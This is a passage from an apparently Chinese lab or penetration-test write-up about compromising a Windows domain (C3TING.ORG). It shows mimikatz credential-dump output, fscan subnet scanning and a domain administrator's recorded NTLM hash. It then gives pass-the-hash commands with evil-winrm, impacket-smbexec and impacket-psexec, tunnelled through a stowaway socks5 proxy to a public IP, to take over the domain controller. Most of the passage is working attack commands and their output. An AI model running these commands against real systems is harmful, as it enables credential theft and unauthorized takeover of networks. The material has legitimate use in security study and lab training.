Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEBLOGIC$
Domain            : C3TING
Logon Server      : (null)
Logon Time        : 2024/6/10 21:26:53
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * Password : (null)
	kerberos :	
	 * Username : weblogic$
	 * Domain   : C3TING.ORG
	 * Password : (null)
	ssp :	KO
	credman :	

mimikatz(commandline) # exit
Bye!

通过判断可以发现已经进入域内环境C3TING.ORG

尝试直接破解出明文密码,但是发现并不行。

192.168.77.250-PTH横向

对利用上传fscan对网段进行扫描:

1
2
3
C:/Users/Public/Downloads/fscanPlus_amd64.exe -h 192.168.77.0/24 -p 1-65535 -nobr -o C:/Users/Public/Downloads/out.txt

-nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)

扫描收集信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
192.168.77.250:139 open
192.168.77.250:135 open
192.168.77.25:135 open
192.168.77.250:88 open
192.168.77.250:53 open
192.168.77.25:139 open
192.168.77.25:445 open
192.168.77.250:389 open
192.168.77.250:445 open
192.168.77.250:464 open
192.168.77.250:593 open
192.168.77.250:636 open
192.168.77.250:3268 open
192.168.77.250:3269 open
192.168.77.250:5985 open
192.168.77.25:5985 open
192.168.77.25:7001 open
192.168.77.25:7201 open
192.168.77.250:9389 open

发现一台存活主机192.168.77.250:

对其再进行一波扫描:

1
C:/Users/Public/Downloads/fscanPlus_amd64.exe -h 192.168.77.250 -o C:/Users/Public/Downloads/77_250.txt

扫描结果如下:

1
2
3
4
5
6
7
8
9
10
192.168.77.250:88 open
192.168.77.250:135 open
192.168.77.250:445 open
192.168.77.250:139 open
[*] NetInfo 
[*]192.168.77.250
   [->]WIN-LAVRSND6J6N
   [->]192.168.77.250
[*] OsInfo 192.168.77.250	(Windows Server 2012 R2 Standard 9600)
[*] NetBios 192.168.77.250  [+] DC:WIN-LAVRSND6J6N.c3ting.org      Windows Server 2012 R2 Standard 9600

梳理综合一下上述的一些重要信息:

1
2
3
4
5
6
7
8
DC:
192.168.77.250
WIN-LAVRSND6J6N.c3ting.org

Username : Administrator
Domain   : C3TING
NTLM     : 7ab183888ecafcccf897c4a5a59c8568
SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9

并且通过上述其开放的端口信息,我们可以直接通过:5985445等端口直接打横向移动如下:

不过记得先想192.168.81.22机器上传一个stowaway工具搭建一个通向192.168.77.0/24网段的隧道

这里我直接将代理端口设置到公网ip的12345端口上:

socks5://公网ip:12345

5985端口PTH横向:

1
proxychains evil-winrm -i WIN-LAVRSND6J6N.c3ting.org -u administrator -H 7ab183888ecafcccf897c4a5a59c8568

成功横向。

445端口PTH横向:

1
proxychains impacket-smbexec C3TING/administrator@192.168.77.250 -hashes :7ab183888ecafcccf897c4a5a59c8568

1
proxychains impacket-psexec C3TING/administrator@192.168.77.250 -hashes :7ab183888ecafcccf897c4a5a59c8568

至此成功拿下全部主机。